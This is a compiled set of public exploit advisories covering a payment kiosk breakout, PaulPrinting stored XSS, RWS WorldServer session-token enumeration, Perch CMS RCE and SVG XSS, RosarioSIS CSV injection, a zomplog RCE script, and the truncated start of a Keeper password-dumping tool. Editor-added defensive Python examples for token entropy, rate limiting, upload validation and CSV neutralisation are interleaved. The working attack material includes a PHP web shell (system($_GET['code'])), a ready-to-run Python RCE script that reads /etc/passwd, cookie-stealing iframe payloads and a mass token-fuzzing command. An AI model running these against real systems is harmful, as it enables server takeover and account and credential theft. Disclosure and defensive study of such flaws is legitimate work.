10.1 By now you are able to download and execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
10.2 Attackers can open websites on the front display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Form & Banking Information)
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escalation)
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
10.6 Attackers are able to exfiltrate data from the local computer system using web connections and available protocols
10.7 Attackers are able to perform man in the middle attacks from the local computer system
11.0 Successful reproduction of the security vulnerability!

Reference(s): Pictures
- 1.png (Terminal A)
- 2.png (Terminal B)
- 3.png (Escape)
- 4.png (Awareness)

Solution - Fix & Patch:
=======================
The security vulnerabilities can be patched by following steps:
1. Disable the context menu extension
2. Disable the context menu
3. Disable web-search
4. Disable marking of text inputs & texts
5. Disallow opening non-whitelisted websites
6. Disable downloading of files
7. Restrict the web-browser access
8. Disallow the file browser
9. Disable the browser debug mode
10. Reconfigure the local firewall to allow and disallow connections
11. Change the access permission to prevent exfiltration

Security Risk:
==============
The security risk of the vulnerability in the local booking and payment terminal system is considered high. The issue can be easily exploited by local attackers with simple interaction via the touch display. Once compromised, the attackers can fully manipulate the computer's operating system and misuse it for further simple or more complex attack scenarios.

Credits & Authors:
==================
Benjamin Mejri (Kunz) - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lars Guenther - https://www.vulnerability-lab.com/show.php?user=L.+Guenther
17. Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285

Release Date:
=============
2023-07-19

Vulnerability Laboratory ID (VL-ID):
====================================
2285

Common Vulnerability Scoring System:
====================================
5.8

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.

Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities have been discovered in the official PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are able to register a user account with malicious script code. After the registration the attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own malicious script code into contact details. This allows an execution on each interaction with users or by reviews of admins in the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduction of the first vulnerability!
8. Follow up by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test payload
Note: The script code executes on each review of the address in the backend or user frontend
10. Successful reproduction of the second vulnerability!

Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>

--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin: https://paulprinting.localhost:8000
Connection: keep-alive
Referer: https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST: title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location: https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33

Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>

Vulnerable Source: Delivery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>

Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
18. Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration

Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions.

Details
=======
Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357

Introduction
============
"WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content." (from the vendor's homepage)

More Details
============
WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours.

Proof of Concept
================
In the following an example "loginWithToken" request is shown:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soapenv="http://schemas.xmlsoap.org">
  <soapenv:Header/>
  <soapenv:Body>
    <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <token xsi:type="xsd:string">FUZZ</token>
    </com:loginWithToken>
  </soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
    --template-file login-soap.req \
    --range 1-2147483647 \
    --hide-pattern "InvalidSessionException" \
    'https://www.example.com'
Target URL: https://www.example.com/

status   header    body     value   extract
500         191     560   5829099
500         191     556   6229259
200         191    3702   7545136
500         191     556   9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned.

Workaround
==========
Lower the rate at which requests can be issued, for example with a frontend proxy.

Fix
===
According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability.

Security Risk
=============
Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk.

Timeline
========
2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========
[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api

RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Alter Posthof 1                         Fax : +49 241 510081-99
52062 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
                                        Geschäftsführer: Patrick Hof, Jens Liebchen
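Added here as an editor's worked example, not code from RedTeam Pentesting or RWS: it turns the advisory's own numbers (a 2^31 numeric token space, 1225 req/s, live tokens in the 7-digit range) into enumeration cost, shows what a CSPRNG-derived session token looks like instead, and implements the per-client rate limit the Workaround section suggests for a frontend proxy as a token bucket. The limiter's parameters and the client addresses are constructed for illustration; nothing here talks to a server.

```python
import math
import secrets
import time

# From the advisory: tokens are positive values below 2^31, the monsoon run
# sustained 1225 req/s, and many live tokens sat in the 7-digit range.
TOKEN_SPACE_31BIT = 2 ** 31
OBSERVED_REQ_PER_S = 1225
SEVEN_DIGIT_RANGE = 10 ** 7


def sweep_seconds(space_size: int, req_per_s: float) -> float:
    """Wall-clock time to try every value in the space at the given rate."""
    return space_size / req_per_s


def token_bits(space_size: int) -> float:
    """Entropy of a token drawn uniformly from `space_size` values."""
    return math.log2(space_size)


def make_session_token(nbytes: int = 16) -> str:
    """128 bits from the OS CSPRNG. A sweep of 2^128 values at 1225 req/s is
    not a realistic attack; the 2^31 numeric space in the advisory is."""
    return secrets.token_urlsafe(nbytes)


class TokenBucketLimiter:
    """Per-client token bucket, the kind of control a frontend proxy applies to
    loginWithToken. `allow()` returns False once a client has spent `capacity`
    attempts faster than they refill at `refill_per_s`. `clock` is injectable
    so the behaviour can be exercised without sleeping (constructed design)."""

    def __init__(self, capacity: int, refill_per_s: float, clock=time.monotonic):
        self.capacity = float(capacity)
        self.refill_per_s = refill_per_s
        self.clock = clock
        self._buckets: dict[str, tuple[float, float]] = {}  # client -> (tokens, last_ts)

    def allow(self, client: str) -> bool:
        now = self.clock()
        tokens, last = self._buckets.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.refill_per_s)
        if tokens >= 1.0:
            self._buckets[client] = (tokens - 1.0, now)
            return True
        self._buckets[client] = (tokens, now)
        return False


def limited_sweep_seconds(space_size: int, refill_per_s: float) -> float:
    """With the bucket drained, one client's sustainable rate is the refill
    rate, so a full sweep of the space takes space_size / refill_per_s."""
    return space_size / refill_per_s


if __name__ == "__main__":
    print(f"31-bit space at {OBSERVED_REQ_PER_S} req/s: "
          f"{sweep_seconds(TOKEN_SPACE_31BIT, OBSERVED_REQ_PER_S) / 86400:.1f} days")
    print(f"7-digit range at the same rate: "
          f"{sweep_seconds(SEVEN_DIGIT_RANGE, OBSERVED_REQ_PER_S) / 3600:.1f} hours")
    print(f"7-digit range limited to 1 req/s per client: "
          f"{limited_sweep_seconds(SEVEN_DIGIT_RANGE, 1.0) / 86400:.0f} days")
    print("CSPRNG token:", make_session_token(), f"({token_bits(2 ** 128):.0f} bits)")
```

The rate limit only raises the cost; it is the workaround, not the fix. The fix is the token space: a session identifier from `secrets.token_urlsafe` has 128 bits of entropy, so no request rate makes a sweep practical, and the limiter becomes defence in depth against credential stuffing rather than the thing keeping sessions private.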
19. Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file

poc.phar file contents:
<?php $a=$_GET['code']; echo system($a);?>

5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd

poc request:
POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
20. Exploit Title: Perch v3.2 - Stored XSS
Application: Perch Cms
Version: v3.2
Bugs: XSS
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. login to account
2. go to http://localhost/perch_v3.2/perch/core/settings/
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""

4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
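The two Perch posts above are the same upload problem seen twice: the assets form stores whatever file it is given under its original name, so a `.phar` is later executed as PHP and an `.svg` carrying `<script>` is served inline from the application origin. Added here as an editor's example, not Perch's code, is the server-side check that closes both: an extension allowlist with magic-byte verification (no denylist of `.php`-like extensions to slip past), a structural check for SVG, a random storage name so the client-chosen filename never reaches disk, and the response headers for serving anything user-uploaded. The sample blobs are constructed; the scripted SVG is the one from the post.

```python
import re
import secrets
import xml.etree.ElementTree as ET

# Extension -> required leading bytes. Nothing outside this table is accepted,
# so .php/.phar/.phtml/.html are rejected without any denylist to bypass.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
SVG_FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
_SAFE_EXT = re.compile(r"^[a-z0-9]{1,5}$")


def _local(name: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def check_svg(data: bytes) -> tuple[bool, str]:
    """Reject SVG that could run script if a browser ever renders it inline."""
    try:
        root = ET.fromstring(data)  # expat parses the DOCTYPE but fetches nothing
    except ET.ParseError as exc:
        return False, f"svg: not well-formed ({exc})"
    if _local(root.tag) != "svg":
        return False, "svg: root element is not <svg>"
    for el in root.iter():
        if _local(el.tag) in SVG_FORBIDDEN_ELEMENTS:
            return False, f"svg: forbidden element <{_local(el.tag)}>"
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                return False, f"svg: event handler attribute {name}"
            if name == "href" and value.strip().lower().startswith(("javascript:", "data:")):
                return False, "svg: scriptable href"
    return True, "ok"


def validate_upload(filename: str, data: bytes) -> tuple[bool, str, str]:
    """Return (accepted, reason, stored_name). The stored name is random with a
    canonical extension, so double extensions and path tricks in the
    client-supplied name are irrelevant to what lands on disk."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if not _SAFE_EXT.match(ext):
        return False, "extension missing or malformed", ""
    if ext == "svg":
        ok, reason = check_svg(data)
        if not ok:
            return False, reason, ""
    elif ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            return False, f"content does not look like {ext}", ""
    else:
        return False, f"extension .{ext} not in allowlist", ""
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


def upload_response_headers() -> dict[str, str]:
    """Headers for serving user uploads: no type sniffing, never rendered inline
    from the application origin, and no script even if something slips through."""
    return {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples: the PHP text and the SVG from the posts above, a clean
# SVG, and a PNG signature followed by padding.
PHAR_SAMPLE = b"<?php $a=$_GET['code']; echo system($a);?>"
SCRIPT_SVG = (b'<?xml version="1.0" standalone="no"?>\n'
              b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
              b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">\n'
              b'<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>\n'
              b'<script type="text/javascript">alert(document.location);</script></svg>')
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">'
             b'<polygon points="0,0 0,50 50,0" fill="#009900"/></svg>')
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("poc.phar", PHAR_SAMPLE), ("malas.svg", SCRIPT_SVG),
                       ("logo.svg", CLEAN_SVG), ("photo.png", PNG_SAMPLE),
                       ("shell.php.png", PHAR_SAMPLE)]:
        print(f"{name:14s} -> {validate_upload(name, blob)[:2]}")
```

The storage location matters as much as the check: uploads belong in a directory the web server never hands to the PHP interpreter, and the `Content-Disposition: attachment` header is what stops a surviving SVG from executing in the application's origin even when a resource URL like `/perch/resources/...` is opened directly.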
21. # Exploit Title: RosarioSIS 10.8.4 - CSV Injection
# Google Dork: NA
# Exploit Author: Ranjeet Jaiswal
# Vendor Homepage: https://www.rosariosis.org/
# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
# Affected Version: 10.8.4
# Category: WebApps
# Tested on: Windows 10
#
# 1. Vendor Description:
#
# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems.
#
# 2. Technical Description:
#
# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute a malicious payload in CSV/XLS and redirect an authorized user to a malicious website.
#
# 3. Proof Of Concept:
# 3.1. Proof of Concept for CSV injection.
#
# Steps to reproduce:
Step 1: Log in to RosarioSIS 10.8.4
Step 2: Go to the Periods page
Step 3: Add a CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")" in the Title field
Step 4: Click on the Save button to save the data.
Step 5: Go to the export tab and export the data
Step 6: When the user opens the downloaded Periods.xls file, you will see a redirection hyperlink.
Step 7: When the user clicks on the link, the user will be redirected to the attacker's or a malicious website.

# 4. Solution: Upgrade to the latest release of RosarioSIS.
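Added as an editor's example, not RosarioSIS code: the export-side fix for the formula injection described above. A spreadsheet treats a cell beginning with `=`, `+`, `-` or `@` (and in some versions a tab or carriage return) as a formula, so the exporter prefixes such cells with a single quote, which Excel and LibreOffice read as a "this is text" marker, and quotes every field so the prefix survives the CSV layer. A small detection helper lists stored values that would have been neutralised, which is useful for reviewing what users have already saved. The Periods rows are constructed; the HYPERLINK value is the one from the post.

```python
import csv
import io

FORMULA_LEADERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet might evaluate this cell. Leading spaces are
    skipped on purpose so ' =1+1' is treated conservatively."""
    return bool(value) and value.lstrip(" ").startswith(FORMULA_LEADERS)


def neutralize_cell(value) -> str:
    """Render a cell so it is stored as text: prefix a single quote when the
    content starts with a formula leader. Typed numeric columns (e.g. -5)
    should be written as numbers by the caller instead of passing through here."""
    if value is None:
        return ""
    text = str(value)
    return "'" + text if is_formula_like(text) else text


def export_csv(rows: list[dict], fieldnames: list[str]) -> str:
    """Write rows with every field quoted; quotes inside values are doubled by
    the csv module, so a value can never break out of its cell either."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({f: neutralize_cell(row.get(f)) for f in fieldnames})
    return buf.getvalue()


def find_formula_cells(rows: list[dict], fieldnames: list[str]) -> list[tuple[int, str, str]]:
    """Detection side: (row index, field, value) for every stored cell that
    export would neutralise, for review of already-saved data."""
    hits = []
    for i, row in enumerate(rows):
        for f in fieldnames:
            v = row.get(f)
            if v is not None and is_formula_like(str(v)):
                hits.append((i, f, str(v)))
    return hits


def read_back(csv_text: str) -> list[dict]:
    """Parse an export again; used to show the neutralised text round-trips."""
    return list(csv.DictReader(io.StringIO(csv_text)))


# Constructed sample of a Periods export; row 1 carries the post's payload.
PERIODS = [
    {"title": "Period 1", "start": "08:00", "end": "08:45"},
    {"title": '=HYPERLINK("https://www.google.com","imp")', "start": "09:00", "end": "09:45"},
    {"title": "+Extra period", "start": "10:00", "end": "10:45"},
    {"title": "-Lunch", "start": "12:00", "end": "12:45"},
]
PERIOD_FIELDS = ["title", "start", "end"]

if __name__ == "__main__":
    print(export_csv(PERIODS, PERIOD_FIELDS))
    for i, f, v in find_formula_cells(PERIODS, PERIOD_FIELDS):
        print(f"row {i} field {f!r} would be neutralised: {v!r}")
```

The quote prefix is visible to users who open the file, which is the accepted trade-off; the alternative of stripping the leading character silently changes data such as a Title that legitimately begins with a minus sign.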
22. #Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog
#Version: v3.9
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

```python
import requests

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"

#login
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
login_req=session.post(login_url,headers=headers,data=login_data)
if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login problem.')
    exit()

#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

#rename
rename_req=session.get(rename_url)

#poc
poc_req=session.get(poc_url)
print(poc_req.text)

#youtube poc video - https://youtu.be/nn7hieGyCFs
```
  23. # Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping # Google Dork: NA # Date: 22-07-2023 # Exploit Author: H4rk3nz0 # Vendor Homepage: https://www.keepersecurity.com/en_GB/ # Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html # Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4 # Tested on: Windows # CVE : CVE-2023-36266 using System; using System.Management; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; using System.Collections.Generic; // Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory // This can persist after logout if the user has not explicitly enabled the option to 'clear process memory' // As a result of this one can extract credentials & master password from a victim after achieving low priv access // This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app. // Github: https://github.com/H4rk3nz0/Peeper static class Program { // To make sure we are 